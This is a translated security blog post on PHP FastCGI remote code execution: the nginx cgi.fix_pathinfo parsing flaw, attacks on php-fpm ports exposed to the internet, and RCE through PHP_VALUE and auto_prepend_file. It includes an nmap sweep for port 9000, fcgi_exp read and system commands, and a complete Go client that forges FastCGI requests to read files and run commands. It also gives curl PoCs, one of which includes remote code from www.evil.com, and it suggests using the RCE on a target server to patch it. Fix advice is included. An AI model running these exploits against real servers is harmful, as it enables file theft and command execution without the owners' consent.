PHP FastCGI RCE Vul

Source: Internet
Author: User
Tags nginx server
Catalog

1. Introduction
2. nginx file type error parsing vulnerability
3. Attacks against FastCGI exposed directly to the public network
4. Using the FCGI API to dynamically modify php.ini settings to achieve RCE

1. Introduction

Let's start by going over the concepts of CGI, FastCGI, php-cgi and PHP-FPM.

1. CGI

CGI exists so that the data a web server passes to a back-end program is in a standard format; it is essentially a protocol standard. A web server such as Nginx is simply a publisher of content:

1) If the request is /index.html, the web server looks for that file in the filesystem and sends it to the browser. This is static content delivery.
2) If the request is /index.php, Nginx knows from its configuration that this is not a static file and that a PHP interpreter is needed, so after some simple processing it hands the request over to the PHP interpreter.

The core question is what data Nginx has to pass to the PHP interpreter, for example:

1) the URL
2) the query string
3) POST data
4) HTTP headers

In essence, CGI is the protocol that specifies what data is passed to the back end to handle the request, and any program that follows this protocol standard can be called a CGI program.

2. FastCGI

First, to be clear, FastCGI is also a protocol standard; it was designed to improve the performance of CGI programs.

1) FastCGI first starts a master process, which parses the configuration file and initialises the execution environment.
2) It then starts several worker processes.
3) When a request comes in, the master hands it to a worker and can immediately accept the next request. This avoids repeating the per-request start-up work and improves efficiency.
4) When there are not enough workers, the master can pre-start more according to its configuration; if it finds too many idle workers it stops some of them, which improves performance while saving resources.

Correspondingly, any program that implements this protocol standard can be called a FastCGI program.

3. php-cgi / php-fastcgi

PHP's interpreter is php-cgi. php-cgi is only a CGI program: on its own it can only parse a request and return a result; it does no process management.

4. php-fpm

PHP-FPM is the manager of php-cgi processes: it manages the php-cgi processes, and its management object is php-cgi.

0x1: PHP-FPM

The PHP-FPM features include

1. Advanced process management features with graceful stop/start.
2. Workers can run in different uid/gid/chroot environments, listen on different ports and use different php.ini settings (this can replace safe_mode).
3. stdout and stderr logging.
4. Emergency restart if opcode cache corruption is detected.
5. Accelerated upload support.
6. "Slow log": records scripts that run unusually slowly (not only the file name but also a PHP backtrace, obtained with ptrace or a similar tool that reads the running data of a remote process).
7. fastcgi_finish_request(): a special function that lets time-consuming work (video conversion, statistics processing, etc.) continue in the background after the request has finished and the response has been flushed.
8. Dynamic/static child process spawning.
9. Basic SAPI status information (Apache-like mod_status).
10. php.ini-based configuration file.

Relevant links:

http://php.net/manual/zh/install.fpm.configuration.php
http://php.net/manual/zh/install.fpm.php
http://segmentfault.com/q/1010000000256516

2. nginx file type error parsing vulnerability

0x1: Vulnerability Description

Vulnerability description: Nginx is a high-performance web server in very wide use; it is often deployed as a reverse proxy and also supports running PHP very well. However, in its default PHP configuration there is a serious security problem: the server can be made to hand any type of file to PHP for parsing, which allows a malicious attacker to compromise an nginx server that supports PHP.

0x2: Vulnerability Analysis

By default Nginx runs PHP through FastCGI, configured as follows in the configuration file:

    location ~ \.php$ {
        root           html;
        fastcgi_pass   127.0.0.1:9000;
        fastcgi_index  index.php;
        fastcgi_param  SCRIPT_FILENAME /scripts$fastcgi_script_name;
        include        fastcgi_params;
    }

The configuration parameters are briefly described below

1. The request URI is used to select the location block. The key variable passed to the backend FastCGI process is SCRIPT_FILENAME, and it is determined by the nginx-generated $fastcgi_script_name; as the analysis shows, $fastcgi_script_name is directly controlled by the request URI.
2. This is where the problem arises. To better support extracting PATH_INFO, PHP has a configuration option, cgi.fix_pathinfo, whose purpose is to extract the real script name from SCRIPT_FILENAME.

Let's assume an attack scenario.

1. Suppose there is a URL: http://localhost/test/test.jpg
2. We request it as: http://localhost/test/test.jpg/test.php
3. Nginx sees the URI /test/test.jpg/test.php, which matches the location ~ \.php$ block.
4. The request is handed to the backend FastCGI process, with Nginx setting the environment variable SCRIPT_FILENAME to /scripts/test/test.jpg/test.php.
5. When the backend receives this, the cgi.fix_pathinfo setting decides whether SCRIPT_FILENAME gets additional processing. If fix_pathinfo is off, PATH_INFO-based routing stops working, so this option is usually turned on. With it on, PHP looks for the real script file by dropping trailing path components until the remaining path exists as a file, and splits the value into SCRIPT_FILENAME and PATH_INFO:
   1) SCRIPT_FILENAME: /scripts/test/test.jpg
   2) PATH_INFO: /test.php
6. Finally /scripts/test/test.jpg is executed as the script for this request: Nginx has had the PHP interpreter process a JPG file, and the attacker can get any type of file parsed as PHP.

The root cause of this vulnerability is that the FastCGI backend and the web server interpret the script-path parameter differently; it is a typical case of two systems in different contexts giving the same request different interpretations. The attack surface is any nginx deployment with this configuration.
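To make the split concrete, here is an added simulation, written for this edit and not code from the original post or from nginx or PHP, of what the page's nginx config and php-cgi do with a request. It models the page's config (`location ~ \.php$` and `SCRIPT_FILENAME /scripts$fastcgi_script_name`), php-cgi's cgi.fix_pathinfo walk-back, and the page's proposed `if ($fastcgi_script_name ~ \..*/.*php)` guard. The filesystem is replaced by an injected `exists` predicate over a constructed file set so it runs offline; function names such as `resolve` and `splitPathInfo` are this example's own.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// docRoot mirrors the page's nginx line: fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name
const docRoot = "/scripts"

// phpLocation mirrors: location ~ \.php$
var phpLocation = regexp.MustCompile(`\.php$`)

// nginxGuard is the page's proposed block rule: if ($fastcgi_script_name ~ \..*/.*php) { return 403; }
var nginxGuard = regexp.MustCompile(`\..*/.*php`)

// splitPathInfo models php-cgi's handling of SCRIPT_FILENAME. With cgi.fix_pathinfo=1 it drops
// trailing path components until the remaining prefix is an existing file; that prefix becomes
// the script to run and the dropped tail becomes PATH_INFO. With cgi.fix_pathinfo=0 the value is
// taken literally. exists is injected so the example never touches a real disk.
func splitPathInfo(scriptFilename string, fixPathInfo bool, exists func(string) bool) (script, pathInfo string, ok bool) {
	if !fixPathInfo {
		return scriptFilename, "", exists(scriptFilename)
	}
	p := scriptFilename
	for {
		if exists(p) {
			return p, strings.TrimPrefix(scriptFilename, p), true
		}
		i := strings.LastIndex(p, "/")
		if i <= 0 {
			return scriptFilename, "", false // walked up to the root without finding a file
		}
		p = p[:i]
	}
}

// blockedByNginxRule reports whether the page's 403 rule would stop the request before php-fpm sees it.
func blockedByNginxRule(fastcgiScriptName string) bool {
	return nginxGuard.MatchString(fastcgiScriptName)
}

// resolve follows one request URI through the page's nginx config and then through php-cgi,
// returning the file PHP would execute ("" if nothing runs) and the PATH_INFO it would see.
func resolve(uri string, fixPathInfo bool, exists func(string) bool) (executed, pathInfo string) {
	if !phpLocation.MatchString(uri) {
		return "", "" // not matched by location ~ \.php$: nginx serves it as a static file
	}
	script, info, ok := splitPathInfo(docRoot+uri, fixPathInfo, exists)
	if !ok {
		return "", "" // php-fpm finds no script and rejects the request
	}
	return script, info
}

func main() {
	// Constructed filesystem: only these two files exist under the document root.
	exists := func(p string) bool { return p == "/scripts/test/test.jpg" || p == "/scripts/index.php" }
	for _, uri := range []string{"/test/test.jpg", "/test/test.jpg/test.php", "/index.php", "/v1.2/index.php"} {
		for _, fix := range []bool{true, false} {
			ex, info := resolve(uri, fix, exists)
			fmt.Printf("uri=%-24s fix_pathinfo=%-5v executed=%-26q path_info=%-12q blocked_by_rule=%v\n",
				uri, fix, ex, info, blockedByNginxRule(uri))
		}
	}
}
```

Run it and compare the rows: with fix_pathinfo on, /test/test.jpg/test.php executes /scripts/test/test.jpg with PATH_INFO /test.php; with it off, nothing runs. The /v1.2/index.php row shows the page's caveat about the guard: that request is rejected purely because a directory name contains a dot, which is why the rule should be narrowed per extension. A complementary nginx-side hardening not on the page is `try_files $uri =404;` inside the PHP location, which refuses any URI that does not exist as a file before it reaches php-fpm.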

0x3:poc

On an Nginx site that supports PHP, take any resource file, for example robots.txt, and append /test.php to its URL; the resource file will then be executed as PHP.

0x4: Fix (restart required)

1. In php.ini set cgi.fix_pathinfo = 0
2. Add the following to the Nginx configuration:

    if ($fastcgi_script_name ~ \..*/.*php) {
        return 403;
    }

   Given MVC frameworks and user-defined sites that may legitimately use paths like xxx/xx.php, this rule should be made more granular, for example *.jpg/.*php, *.txt/.*php.

In addition, Nginx can hot-reload its configuration file without a restart:

    service nginx reload    # or: /etc/init.d/nginx reload

0x5: Fix (no restart required)

The premise is that the target server also has its FCGI API exposed to the public network. The idea is a hotfix: since FastCGI itself allows RCE, use that RCE to patch the machine's FastCGI vulnerability.

1. Use the FCGI RCE vulnerability to add the following to the target server's Nginx configuration (then reload Nginx):
    if ($fastcgi_script_name ~ \..*/.*php) { return 403; }
2. Use the FCGI RCE vulnerability to set cgi.fix_pathinfo = 0 in php.ini. php-fpm reads php.ini at start-up, so the new value takes effect once the php-fpm master re-reads it (a graceful reload via SIGUSR2, which the same RCE can trigger).

Relevant links:

http://www.80sec.com/nginx-securit.html
http://php.net/manual/zh/ini.core.php

3. Attacks against FastCGI exposed directly to the public network

Besides exploiting the Nginx file parsing vulnerability: because FastCGI and the web server communicate over the network, more and more clusters bind FastCGI directly to the public network, where anyone can reach it. This means anyone can impersonate the web server and have FastCGI execute the script content they choose. We use PHP-FPM (PHP's FastCGI implementation) as the example of the security risks of exposing FastCGI directly to the public network.

0x1: Affected range Scan

    nmap -sV -p 9000 --open 173.xxx.xxx.1/24

1. PHP-FPM's default listening port is 9000.
2. -sV is used because other services may also be listening on port 9000, so nmap's service fingerprinting is needed to identify php-fpm first.

0x2:fcgi Hijacking POC

Because the web server has to supply FastCGI with a number of parameters, every time it forwards a request it passes the fastcgi_params set to the FCGI process. Originally these parameters were not under the user's control, but once FCGI is exposed to the outside we can set them ourselves, which lets us do things that were not possible before.

    ./fcgi_exp read 173.xxx.xxx.183 9000 /etc/issue

1. In fastcgi_params, set DOCUMENT_ROOT to the root directory "/".
2. Set SCRIPT_FILENAME to /etc/issue.
3. As long as the php-fpm worker has permission, we can make FCGI read any file on the machine. It is not actually a file read: PHP executes the file as a script, and a file containing no PHP tags is echoed back verbatim.

Fcgi_exp.go

    ...
    // Environment handed to php-fpm in FCGI_PARAMS, impersonating the web server.
    env := make(map[string]string)
    env["SCRIPT_FILENAME"] = url            // file php-fpm will execute (or echo back)
    env["DOCUMENT_ROOT"] = "/"              // lets SCRIPT_FILENAME point anywhere
    env["SERVER_SOFTWARE"] = "go/fcgiclient"
    env["REMOTE_ADDR"] = "127.0.0.1"
    env["SERVER_PROTOCOL"] = "HTTP/1.1"
    if len(reqParams) != 0 {
        // POST mode: the body is prepended as PHP code via php://input
        env["CONTENT_LENGTH"] = strconv.Itoa(len(reqParams))
        env["REQUEST_METHOD"] = "POST"
        env["PHP_VALUE"] = "allow_url_include = On\ndisable_functions = \nsafe_mode = Off\nauto_prepend_file = php://input"
    } else {
        env["REQUEST_METHOD"] = "GET"
    }
    ...

0x3: Attack vectors

1. As with a common LFI vulnerability: if you know the path of a log file on the machine, or of any file whose content you can control, you can execute arbitrary code. // On turning an LFI vulnerability into RCE, see the separate article: http://www.cnblogs.com/LittleHann/p/3665062.html
2. Dynamically modify the value of auto_prepend_file in php.ini to remotely include and execute an arbitrary file, turning the LFI into an RFI.

0x4: Repair Solution

1. Do not expose the FCGI interface to the public network.
2. Restrict who can talk to FCGI: the FastCGI protocol itself has no authentication, so bind php-fpm to a Unix socket or to 127.0.0.1, and for TCP listeners use php-fpm's listen.allowed_clients.

4. Using the FCGI API to dynamically modify php.ini settings to achieve RCE

0x1: Attack vectors

In general, by setting fastcgi_params we can use PHP_ADMIN_VALUE and PHP_VALUE to dynamically change PHP settings:

    env["REQUEST_METHOD"] = "POST"
    env["PHP_VALUE"] = "auto_prepend_file = php://input"
    env["PHP_ADMIN_VALUE"] = "allow_url_include = On\ndisable_functions = \nsafe_mode = Off"

PHP then auto-prepends php://input, i.e. the POST body, so we write our PHP code into the POST content and it executes directly. SCRIPT_FILENAME must still point at a file that exists (php-fpm's security.limit_extensions only allows PHP extensions by default), hence the existing /tmp/a.php below:

    ./fcgi_exp system 127.0.0.1 9000 /tmp/a.php "id; uname -a"
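Sections 3 and 4 both come down to speaking the FastCGI protocol directly to php-fpm. The following Go program is an added example written for this edit, not the fcgi_exp tool nor any code from the original post: it builds the same environment fcgi_exp sets (the "read" mode of section 3 and the PHP_VALUE/PHP_ADMIN_VALUE "system" mode of section 4), frames it as FastCGI records exactly as a web server would, and parses the reply records. The names `forgedParams`, `buildRequest` and `collect` are this example's own; /etc/issue and /tmp/a.php are the page's example paths, and any target address is an assumed lab value.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"io"
	"strconv"
)

// Record types and the responder role, from the FastCGI specification.
const (
	fcgiVersion, fcgiResponder                              = 1, 1
	fcgiBeginRequest, fcgiEndRequest, fcgiParams, fcgiStdin = 1, 3, 4, 5
	fcgiStdout, fcgiStderr                                  = 6, 7
)

// record frames one FastCGI record: 8-byte header, content (under 64 KiB, which holds for
// every request built here), then zero padding to an 8-byte boundary.
func record(typ uint8, reqID uint16, content []byte) []byte {
	pad := (8 - len(content)%8) % 8
	hdr := []byte{fcgiVersion, typ, byte(reqID >> 8), byte(reqID), byte(len(content) >> 8), byte(len(content)), byte(pad), 0}
	return append(append(hdr, content...), make([]byte, pad)...)
}

// encodeLength is the name-value length encoding: one byte below 128, else four bytes with the top bit set.
func encodeLength(n int) []byte {
	if n < 128 {
		return []byte{byte(n)}
	}
	return []byte{byte(n>>24) | 0x80, byte(n >> 16), byte(n >> 8), byte(n)}
}

// encodeParams serialises the environment the way a web server does inside FCGI_PARAMS.
func encodeParams(pairs [][2]string) []byte {
	var b bytes.Buffer
	for _, kv := range pairs {
		b.Write(encodeLength(len(kv[0])))
		b.Write(encodeLength(len(kv[1])))
		b.WriteString(kv[0] + kv[1])
	}
	return b.Bytes()
}

// forgedParams is the environment fcgi_exp sets. code == nil is the page's "read" mode: DOCUMENT_ROOT "/"
// lets SCRIPT_FILENAME point anywhere and a file without PHP tags is echoed back. With code set it is the
// "system" mode: PHP_VALUE/PHP_ADMIN_VALUE make PHP prepend php://input (the POST body) to an existing script.
func forgedParams(scriptFilename string, code []byte) [][2]string {
	p := [][2]string{
		{"SCRIPT_FILENAME", scriptFilename}, {"DOCUMENT_ROOT", "/"}, {"REQUEST_METHOD", "GET"},
		{"SERVER_SOFTWARE", "go/fcgiclient"}, {"REMOTE_ADDR", "127.0.0.1"}, {"SERVER_PROTOCOL", "HTTP/1.1"},
	}
	if code != nil {
		p[2][1] = "POST"
		p = append(p, [2]string{"CONTENT_LENGTH", strconv.Itoa(len(code))},
			[2]string{"PHP_VALUE", "auto_prepend_file = php://input"},
			[2]string{"PHP_ADMIN_VALUE", "allow_url_include = On\ndisable_functions = \nsafe_mode = Off"})
	}
	return p
}

// buildRequest is the whole stream a forged "web server" sends: BEGIN_REQUEST, PARAMS plus its
// empty terminator, STDIN (the POST body, when there is one) plus its empty terminator.
func buildRequest(reqID uint16, scriptFilename string, code []byte) []byte {
	var out bytes.Buffer
	out.Write(record(fcgiBeginRequest, reqID, []byte{0, fcgiResponder, 0, 0, 0, 0, 0, 0}))
	out.Write(record(fcgiParams, reqID, encodeParams(forgedParams(scriptFilename, code))))
	out.Write(record(fcgiParams, reqID, nil))
	if len(code) > 0 {
		out.Write(record(fcgiStdin, reqID, code))
	}
	out.Write(record(fcgiStdin, reqID, nil))
	return out.Bytes()
}

// collect parses the reply records from r, gathering STDOUT and STDERR until END_REQUEST.
func collect(r io.Reader) (stdout, stderr []byte, err error) {
	for {
		var hdr [8]byte
		if _, err = io.ReadFull(r, hdr[:]); err != nil {
			return stdout, stderr, err
		}
		clen := int(binary.BigEndian.Uint16(hdr[4:6]))
		body := make([]byte, clen+int(hdr[6])) // content followed by padding
		if _, err = io.ReadFull(r, body); err != nil {
			return stdout, stderr, err
		}
		switch hdr[1] {
		case fcgiStdout:
			stdout = append(stdout, body[:clen]...)
		case fcgiStderr:
			stderr = append(stderr, body[:clen]...)
		case fcgiEndRequest:
			return stdout, stderr, nil
		}
	}
}
```

Against a php-fpm listener you own, the exchange is `conn, err := net.Dial("tcp", "127.0.0.1:9000")`, then `conn.Write(buildRequest(1, "/etc/issue", nil))` for the read mode or `conn.Write(buildRequest(1, "/tmp/a.php", []byte("<?php system('id; uname -a'); ?>")))` for the system mode, then `out, errOut, err := collect(conn)`. Nothing in the exchange authenticates the sender, which is the whole point of sections 3 and 4: whoever can reach port 9000 is the web server as far as php-fpm is concerned.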

0x2:poc

1. Local include, executing code directly (the PHP code goes in the User-Agent header and is picked up through /proc/self/environ):
    curl -H "User-Agent: <PHP code>" "http://target.com/test.php?-dauto_prepend_file%3d/proc/self/environ+-n"
2. Remote include, executing code:
    curl "http://target.com/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp%3a%2f%2fwww.evil.com%2fevil.txt"

// The -d parameter defines an INI value for PHP (-n skips php.ini). These PoCs work because a vulnerable php-cgi passed the query string to itself as command-line arguments (CVE-2012-1823, see the eindbazen advisory below); they target php-cgi deployments rather than the php-fpm FastCGI listener discussed above.

0x3: Fix

1. Do not expose the FCGI interface to the public network (important).
2. Restrict access to FCGI (Unix socket, loopback binding, or listen.allowed_clients), since the protocol has no authentication of its own.
3. Upgrade php-cgi to a version that fixes CVE-2012-1823.

Relevant links:

http://zone.wooyun.org/content/1060
http://zone.wooyun.org/content/151
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/


The above introduced PHP FastCGI RCE vulnerabilities and the related material; I hope it is helpful to readers interested in PHP.
